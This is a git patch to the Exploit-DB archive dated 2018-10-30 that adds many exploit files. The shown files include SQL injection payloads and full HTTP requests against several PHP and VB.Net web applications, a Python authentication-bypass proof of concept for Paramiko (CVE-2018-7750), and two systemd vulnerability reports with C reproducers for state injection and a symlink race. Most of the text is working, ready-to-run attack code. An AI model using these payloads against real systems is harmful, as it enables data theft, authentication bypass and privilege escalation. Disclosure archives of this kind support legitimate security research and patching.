From 15b77b5965340eb61d5c0805970ccc43c72e8bef Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 30 Oct 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-10-30 33 changes to exploits/shellcodes Navicat 12.0.29 - 'SSH' Denial of Service (PoC) AlienIP 2.41 - Denial of Service (PoC) Local Server 1.0.9 - Denial of Service (PoC) systemd - reexec State Injection systemd - chown_one() can Dereference Symlinks ASRock Drivers - Privilege Escalation Modbus Slave 7.0.0 - Denial of Service (PoC) School Equipment Monitoring System 1.0 - 'login' SQL Injection Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC) Paramiko 2.4.1 - Authentication Bypass Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection Grapixel New Media 2 - 'pageref' SQL Injection Library Management System 1.0 - 'frmListBooks' SQL Injection Open Faculty Evaluation System 7 - 'batch_name' SQL Injection Card Payment 1.0 - Cross-Site Request Forgery (Update Admin) MTGAS MOGG Web Simulator Script - SQL Injection Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery Curriculum Evaluation System 1.0 - SQL Injection Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection School Event Management System 1.0 - SQL Injection School Event Management System 1.0 - Arbitrary File Upload School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin) School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin) School Attendance Monitoring System 1.0 - Arbitrary File Upload School Attendance Monitoring System 1.0 - SQL Injection PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection RhinOS CMS 3.x - Arbitrary File Download E-Negosyo System 1.0 - SQL Injection SaltOS Erp Crm 3.1 r8126 - SQL Injection SaltOS Erp Crm 3.1 r8126 - SQL Injection (2) SaltOS Erp Crm 3.1 r8126 - Database File Download K-iwi Framework 1775 - SQL Injection --- exploits/aspx/webapps/45706.vb | 55 +++ exploits/linux/dos/45714.c | 159 ++++++++ exploits/linux/dos/45715.txt | 151 ++++++++ exploits/linux/remote/45712.py | 31 ++ exploits/php/webapps/45703.txt | 140 +++++++ exploits/php/webapps/45704.txt | 24 ++ exploits/php/webapps/45707.txt | 147 ++++++++ exploits/php/webapps/45713.txt | 37 ++ exploits/php/webapps/45717.txt | 11 + exploits/php/webapps/45718.txt | 56 +++ exploits/php/webapps/45719.txt | 119 ++++++ exploits/php/webapps/45720.txt | 73 ++++ exploits/php/webapps/45721.txt | 43 +++ exploits/php/webapps/45722.txt | 108 ++++++ exploits/php/webapps/45723.txt | 89 +++++ exploits/php/webapps/45724.txt | 84 +++++ exploits/php/webapps/45725.txt | 84 +++++ exploits/php/webapps/45726.txt | 89 +++++ exploits/php/webapps/45727.txt | 108 ++++++ exploits/php/webapps/45728.txt | 104 +++++ exploits/php/webapps/45729.txt | 62 +++ exploits/php/webapps/45730.txt | 39 ++ exploits/php/webapps/45731.txt | 50 +++ exploits/php/webapps/45733.txt | 39 ++ exploits/php/webapps/45734.txt | 47 +++ exploits/php/webapps/45735.txt | 59 +++ exploits/windows/dos/45716.txt | 503 +++++++++++++++++++++++++ exploits/windows/dos/45732.txt | 27 ++ exploits/windows_x86-64/dos/45705.py | 25 ++ exploits/windows_x86-64/dos/45708.py | 22 ++ exploits/windows_x86-64/dos/45711.py | 46 +++ exploits/windows_x86-64/local/45709.vb | 57 +++ exploits/windows_x86/local/45710.pl | 43 +++ files_exploits.csv | 33 ++ 34 files changed, 2764 insertions(+) create mode 100644 exploits/aspx/webapps/45706.vb create mode 100644 exploits/linux/dos/45714.c create mode 100644 exploits/linux/dos/45715.txt create mode 100755 exploits/linux/remote/45712.py create mode 100644 exploits/php/webapps/45703.txt create mode 100644 exploits/php/webapps/45704.txt create mode 100644 exploits/php/webapps/45707.txt create mode 100644 exploits/php/webapps/45713.txt create mode 100644 exploits/php/webapps/45717.txt create mode 100644 exploits/php/webapps/45718.txt create mode 100644 exploits/php/webapps/45719.txt create mode 100644 exploits/php/webapps/45720.txt create mode 100644 exploits/php/webapps/45721.txt create mode 100644 exploits/php/webapps/45722.txt create mode 100644 exploits/php/webapps/45723.txt create mode 100644 exploits/php/webapps/45724.txt create mode 100644 exploits/php/webapps/45725.txt create mode 100644 exploits/php/webapps/45726.txt create mode 100644 exploits/php/webapps/45727.txt create mode 100644 exploits/php/webapps/45728.txt create mode 100644 exploits/php/webapps/45729.txt create mode 100644 exploits/php/webapps/45730.txt create mode 100644 exploits/php/webapps/45731.txt create mode 100644 exploits/php/webapps/45733.txt create mode 100644 exploits/php/webapps/45734.txt create mode 100644 exploits/php/webapps/45735.txt create mode 100644 exploits/windows/dos/45716.txt create mode 100644 exploits/windows/dos/45732.txt create mode 100755 exploits/windows_x86-64/dos/45705.py create mode 100755 exploits/windows_x86-64/dos/45708.py create mode 100755 exploits/windows_x86-64/dos/45711.py create mode 100644 exploits/windows_x86-64/local/45709.vb create mode 100755 exploits/windows_x86/local/45710.pl diff --git a/exploits/aspx/webapps/45706.vb b/exploits/aspx/webapps/45706.vb new file mode 100644 index 000000000..f84175413 --- /dev/null +++ b/exploits/aspx/webapps/45706.vb @@ -0,0 +1,55 @@ +# Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/janobe +# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/librarymanagementsystem.zip +# Version: 1.0 +# Category: Windows +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-18796 + +# POC: +# 1) +# textSearch System.Windows.Forms.TextBox / [SQL] +# +# %' And (SElecT 112 FRom(SELECT CoUNT(*),conCAT((SELecT (ELT(112=112,1))),CONCAT_WS(0x203a20,USEr(),DATABASE(),VERsiON()),FLOOR(RAnD(0)*2))x FRoM INFORmaTION_SCHeMA.PLuGINS GRoUP BY x)a) AnD'%'=' +# +# https://1.bp.blogspot.com/-8FBYHFTLhhQ/W9YnCQg0nZI/AAAAAAAAENM/St0sn1IYjDs5kTjvYQNtT_mBmOEv-RaIgCLcBGAs/s1600/sql1.png +# +#[PATH]/forms/frmListofBooks.vb +#... + +Public Class frmListBooks + + Private Sub frmListBooks_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load + sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _ + ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` " + reloadDtg(sql, dtgList) + End Sub + + Private Sub txtSerach_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged + sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _ + ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` AND (`BookTitle` Like '%" & txtSearch.Text & "%' OR `Author` Like '%" & txtSearch.Text & "%' OR `AccessionNo` Like '%" & txtSearch.Text & "%')" + reloadDtg(sql, dtgList) + End Sub + + Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click + Try + If dtgList.CurrentRow.Cells(10).Value = "Available" Then + frmBorrow.txtAccesionNumBorrow.Text = dtgList.CurrentRow.Cells(0).Value + Me.Close() + Else + MsgBox("The book is already borrowed.", MsgBoxStyle.Exclamation) + + End If + Catch ex As Exception + + End Try + + End Sub + + Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click + Me.Close() + End Sub + End Class \ No newline at end of file diff --git a/exploits/linux/dos/45714.c b/exploits/linux/dos/45714.c new file mode 100644 index 000000000..b47fb0a95 --- /dev/null +++ b/exploits/linux/dos/45714.c @@ -0,0 +1,159 @@ +/* +[I am sending this bug report to Ubuntu, even though it's an upstream +bug, as requested at +https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports +.] + +When systemd re-executes (e.g. during a package upgrade), state is +serialized into a memfd before the execve(), then reloaded after the +execve(). Serialized data is stored as text, with key-value pairs +separated by newlines. Values are escaped to prevent control character +injection. + +Lines associated with a systemd unit are read in unit_deserialize() +using fgets(): + + char line[LINE_MAX], *l, *v; + [...] + if (!fgets(line, sizeof(line), f)) { + if (feof(f)) + return 0; + return -errno; + } + +LINE_MAX is 2048: + +/usr/include/bits/posix2_lim.h:#define LINE_MAX _POSIX2_LINE_MAX +/usr/include/bits/posix2_lim.h:#define _POSIX2_LINE_MAX 2048 + + +When fgets() encounters overlong input, it behaves dangerously. If a +line is more than 2047 characters long, fgets() will return the first +2047 characters and leave the read cursor in the middle of the +overlong line. Then, when fgets() is called the next time, it +continues to read data from offset 2047 in the line as if a new line +started there. Therefore, if an attacker can inject an overlong value +into the serialized state somehow, it is possible to inject extra +key-value pairs into the serialized state. + +A service that has `NotifyAccess != none` can send a status message to +systemd that will be stored as a property of the service. When systemd +re-executes, this status message is stored under the key +"status-text". +Status messages that are sent to systemd are received by +manager_dispatch_notify_fd(). This function has a receive buffer of +size NOTIFY_BUFFER_MAX==PIPE_BUF==4096. + +Therefore, a service with `NotifyAccess != none` can trigger this bug. + + +Reproducer: + +Create a simple service with NotifyAccess by copying the following +text into /etc/systemd/system/notify_test.service (assuming that your +home directory is /home/user): + +========= +[Unit] +Description=jannh test service for systemd notifications + +[Service] +Type=simple +NotifyAccess=all +FileDescriptorStoreMax=100 +User=user +ExecStart=/home/user/test_service +Restart=always + +[Install] +WantedBy=multi-user.target +========= + +Create a small binary that sends an overlong status when it starts up: + +========= +*/ + +user@ubuntu-18-04-vm:~$ cat test_service.c +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +int main(void) { + int sock = socket(AF_UNIX, SOCK_DGRAM, 0); + if (sock == -1) err(1, "socket"); + struct sockaddr_un addr = { + .sun_family = AF_UNIX, + .sun_path = "/run/systemd/notify" + }; + if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))) err(1, "connect"); + + char message[0x2000] = "STATUS="; + memset(message+7, 'X', 2048-1-12); + strcat(message, "main-pid=13371337"); + struct iovec iov = { + .iov_base = message, + .iov_len = strlen(message) + }; + union { + struct cmsghdr cmsghdr; + char buf[CMSG_SPACE(sizeof(struct ucred))]; + } control = { .cmsghdr = { + .cmsg_level = SOL_SOCKET, + .cmsg_type = SCM_CREDENTIALS, + .cmsg_len = CMSG_LEN(sizeof(struct ucred)) + }}; + struct ucred *ucred = (void*)(control.buf + CMSG_ALIGN(sizeof(struct cmsghdr))); + ucred->pid = getpid(); + ucred->uid = getuid(); + ucred->gid = getgid(); + struct msghdr msghdr = { + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = &control, + .msg_controllen = sizeof(control) + }; + if (sendmsg(sock, &msghdr, 0) != strlen(message)) err(1, "sendmsg"); + + while (1) pause(); +} + +/* +user@ubuntu-18-04-vm:~$ gcc -o test_service test_service.c +user@ubuntu-18-04-vm:~$ +========= + +Install the service, and start it. Then run strace against systemd, +and run: + +========= +root@ubuntu-18-04-vm:~# systemctl daemon-reexec +root@ubuntu-18-04-vm:~# systemctl stop notify_test.service +========= + +The "stop" command hangs, and you'll see the following in strace: + +========= +root@ubuntu-18-04-vm:~# strace -p1 2>&1 | grep 13371337 +openat(AT_FDCWD, "/proc/13371337/stat", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory) +kill(13371337, SIG_0) = -1 ESRCH (No such process) +kill(13371337, SIGTERM) = -1 ESRCH (No such process) +========= + +This demonstrates that systemd's representation of the service's PID +was clobbered by the status message. + + +This can in theory, depending on how the active services are +configured and some other things, also be used to e.g. steal file +descriptors that other services have stored in systemd (visible in +the serialized representation as "fd-store-fd"). + +This isn't the only place in systemd that uses fgets(); other uses of +fgets() should probably also be audited and potentially replaced with +a safer function. +*/ \ No newline at end of file diff --git a/exploits/linux/dos/45715.txt b/exploits/linux/dos/45715.txt new file mode 100644 index 000000000..5c71f2a14 --- /dev/null +++ b/exploits/linux/dos/45715.txt @@ -0,0 +1,151 @@ +[I am sending this bug report to Ubuntu, even though it's an upstream +bug, as requested at +https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports +.] + +When chown_one() in the recursive chown logic decides that it has to change +ownership of a directory entry, it first changes ownership as follows: + + if (name) + r = fchownat(fd, name, uid, gid, AT_SYMLINK_NOFOLLOW); + else + r = fchown(fd, uid, gid); + if (r < 0) + return -errno; + +So far, this looks good. But then this happens: + + /* The linux kernel alters the mode in some cases of chown(). Let's undo this. */ + if (name) { + if (!S_ISLNK(st->st_mode)) + r = fchmodat(fd, name, st->st_mode, 0); + else /* There's currently no AT_SYMLINK_NOFOLLOW for fchmodat() */ + r = 0; + } else + r = fchmod(fd, st->st_mode); + +This is dangerous, especially in the case where `name != NULL`. + +First off: I don't think that the overall objective of this code block makes +sense. Yes, the kernel sometimes changes the mode when ownership is changed - +but that's only for set-UID binaries and set-GID binaries (but not +set-GID directories). +I'm pretty sure that setuid/setgid binaries aren't supposed to appear in these +directories anyway. + +The problem here is that, as the comment explains, +`fchmodat(fd, name, st->st_mode, 0)` follows symlinks. The fchmodat() call is +guarded by a `S_ISLNK(st->st_mode)` check, but that's obviously racy and +therefore doesn't actually help. + +My recommended fix is to just remove the offending code block. If, for some +crazy reason, you actually want to support changing the ownership of +setuid/setgid binaries, an alternative might be to do something like this: + + int fd2 = openat(fd, name, O_PATH|O_NOFOLLOW|O_CLOEXEC); + if (fd2 >= 0) { + fchmod(fd2, st->st_mode); + close(fd2); + } + +To reproduce, as root, create a service with "Restart=always", +"StartLimitIntervalSec=0", "StateDirectory=test_service" and "User=user" (where +"user" is the name of an unprivileged account). Point "ExecStart" at a binary +that immediately exits: + +======== +int main(void) { + return 0; +} +======== + +Then start the service. + +Next, as the user the service is running as, create some entries in +/var/lib/test_service: + +======== +user@ubuntu-18-04-vm:~$ cd /var/lib/test_service/ +user@ubuntu-18-04-vm:/var/lib/test_service$ touch foo +user@ubuntu-18-04-vm:/var/lib/test_service$ chmod 0666 foo +user@ubuntu-18-04-vm:/var/lib/test_service$ ln -s /etc/hostname foo2 +user@ubuntu-18-04-vm:/var/lib/test_service$ ln foo foo_link +user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la +total 8 +drwxr-xr-x 2 user user 4096 Okt 8 16:42 . +drwxr-xr-x 67 root root 4096 Okt 8 15:30 .. +-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo +lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo2 -> /etc/hostname +-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link +======== + +Create and run a helper that continuously switches "foo" and "foo2" with each +other: + +======== +user@ubuntu-18-04-vm:~$ cat exchange.c +#define _GNU_SOURCE +#include +#include +#include +#include +#include +int main(int argc, char **argv) { + char *base = argv[1], *p1 = argv[2], *p2 = argv[3]; + if (chdir(base)) err(1, "chdir"); + while (1) { + if (syscall(__NR_renameat2, AT_FDCWD, p1, AT_FDCWD, p2, 2)) + perror("renameat"); + } +} +user@ubuntu-18-04-vm:~$ gcc -o exchange exchange.c -O2 +user@ubuntu-18-04-vm:~$ ./exchange /var/lib/test_service foo foo2 +======== + +Change ownership of "foo_link" and the test_service directory to trigger the +permission fixup logic when the service restarts the next time: + +======== +user@ubuntu-18-04-vm:/var/lib/test_service$ chown user:cdrom foo_link . +======== + +Check whether it worked: + +======== +user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname . +-rw-r--r-- 1 root root 16 Jul 3 19:20 /etc/hostname + +.: +total 8 +drwxr-xr-x 2 user user 4096 Okt 8 16:45 . +drwxr-xr-x 67 root root 4096 Okt 8 15:30 .. +lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo -> /etc/hostname +-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo2 +-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link +======== + +If it didn't work (as in this example), retry the chown a few times. After a few +times, you should see this: + +======== +user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname . +-rw-rw-rw- 1 root root 16 Jul 3 19:20 /etc/hostname + +.: +total 8 +drwxr-xr-x 2 user user 4096 Okt 8 16:46 . +drwxr-xr-x 67 root root 4096 Okt 8 15:30 .. +-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo +lrwxrwxrwx 1 user user 13 Okt 8 16:23 foo2 -> /etc/hostname +-rw-rw-rw- 2 user user 0 Okt 8 16:16 foo_link +======== + + + +Another thing that might also go wrong, but that I haven't tested, is the +interaction with the mount.ecryptfs_private helper that comes with ecryptfs. +As far as I can tell, an attacker would be able to use mount.ecryptfs_private to +mount an ecryptfs inside the StateDirectory. This ecryptfs instance could then +function similar to a bind mount, causing systemd to change the ownership of +files that are e.g. in /etc. You might want to ensure that no files or +directories you access are located on an ecryptfs filesystem. \ No newline at end of file diff --git a/exploits/linux/remote/45712.py b/exploits/linux/remote/45712.py new file mode 100755 index 000000000..d58809319 --- /dev/null +++ b/exploits/linux/remote/45712.py @@ -0,0 +1,31 @@ +# Exploit Title: Paramiko 2.4.1 - Authentication Bypass +# Date: 2018-10-27 +# Exploit Author: Adam Brown +# Vendor Homepage: https://www.paramiko.org +# Software Link: https://github.com/paramiko/paramiko/tree/v1.15.2 +# Version: < 1.17.6, 1.18.x < 1.18.5, 2.0.x < 2.0.8, 2.1.x < 2.1.5, 2.2.x < 2.2.3, 2.3.x < 2.3.2, and 2.4.x < 2.4.1 +# Tested on: Multiple +# CVE : CVE-2018-7750 + +# This PoC is based on discussions found at the following github issue: +# https://github.com/paramiko/paramiko/issues/1175 +# TLDR, Paramiko doesn't check if the client has completed the authentication step +# before allowing the client to open channels. The PoC below connects to an SFTP +# server, and lists the root directory without authenticating. Slight modification +# is required if you want to open an SSH channel. + +#!/usr/bin/python +import paramiko + +host = '127.0.0.1' +port = 22 + +trans = paramiko.Transport((host, port)) +trans.start_client() + +# If the call below is skipped, no username or password is required. +# trans.auth_password('username', 'password') + +sftp = paramiko.SFTPClient.from_transport(trans) +print(sftp.listdir('/')) +sftp.close() \ No newline at end of file diff --git a/exploits/php/webapps/45703.txt b/exploits/php/webapps/45703.txt new file mode 100644 index 000000000..d30dddff5 --- /dev/null +++ b/exploits/php/webapps/45703.txt @@ -0,0 +1,140 @@ +# Exploit Title: Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://openfacultyeval.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php5_6.zip/download +# Version: Php 5.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +/[PATH]/submit_feedback.php +#.... +#17 if(isset($_POST['submit'])) +#18 { +#19 //feedback no +#20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['']."'"; +#21 $res_feedback_no=mysql_query($check_feedback_no) or die(mysql_error()); +#22 $result=mysql_fetch_array($res_feedback_no); +#23 +#24 +#25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'"; +#26 //echo $sql; +#27 $res=mysql_query($sql) or die(mysql_error()); +#.... + +# POC: +# 1) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 +batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:02:53 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 235 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 278 +b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:15:30 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1204 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 280 +sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:19:57 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1202 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 4) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 280 +division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:23:11 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1202 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 5) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 279 +roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 01:29:20 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1203 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45704.txt b/exploits/php/webapps/45704.txt new file mode 100644 index 000000000..8b37d0c4e --- /dev/null +++ b/exploits/php/webapps/45704.txt @@ -0,0 +1,24 @@ +# Exploit Title: Grapixel New Media 2 - 'pageref' SQL Injection +# Exploit Author: Berk Dusunur +# Google Dork: N/A +# Type: Web App +# Date: 2018-10-26 +# Vendor Homepage: http://www.grapixel.com +# Software Link: http://www.grapixel.com +# Affected Version: v2 +# Tested on: MacosX +# CVE : N/A + +#Proof Of Concept +# Time-Based sql injection is called a data extraction event with request response times +# with the server when there is no other way for it to extract aggressive data. It should +# be determined by sql injection type. I discovered blind time-based sql injection. +# Because single quotes didn't break the page structure, so I tried to get results +# using waitfor delay instead. + +http://target/pages.aspx?pageref=[SQL] +http://target/pages.aspx?pageref=' waitfor delay '00:00:05'--; +http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>80) WAITFOR DELAY '0:0:5'-- +http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>81) WAITFOR DELAY '0:0:5'-- + +Ascii equivalent of 80,81 figures The first database, wait 5 seconds if the first letter is "p" \ No newline at end of file diff --git a/exploits/php/webapps/45707.txt b/exploits/php/webapps/45707.txt new file mode 100644 index 000000000..a595215db --- /dev/null +++ b/exploits/php/webapps/45707.txt @@ -0,0 +1,147 @@ +# Exploit Title: Open Faculty Evaluation System 7 - 'batch_name' SQL Injection +# Dork: N/A +# Date: 2018-10-29 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://openfacultyeval.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php7.zip/download +# Version: Php 7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +/[PATH]/submit_feedback.php +#.... +#15 include("includes/config_db.php"); +#16 +#17 if(isset($_POST['submit'])) +#18 { +#19 //feedback no +#20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['batch_name']."'"; +#21 $res_feedback_no=mysqli_query($conn, $check_feedback_no) or die(mysqli_error($conn)); +#22 $result=mysqli_fetch_array($res_feedback_no); +#23 +#24 +#25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'"; +#26 //echo $sql; +#27 $res=mysqli_query($conn, $sql) or die(mysqli_error($conn)); +#28 +#29 //echo mysqli_num_rows($res); +#30 //exit; +#31 if(mysqli_num_rows($res)>=1) +#32 { +#.... + +# POC: +# 1) +# http://localhost/[PATH]/submit_feedback.php +# +POST /[PATH]/submit_feedback.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 282 +batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit +HTTP/1.1 200 OK +Date: Mon, 29 Oct 2018 00:42:01 GMT +Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22 +X-Powered-By: PHP/7.1.22 +Content-Length: 311 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive 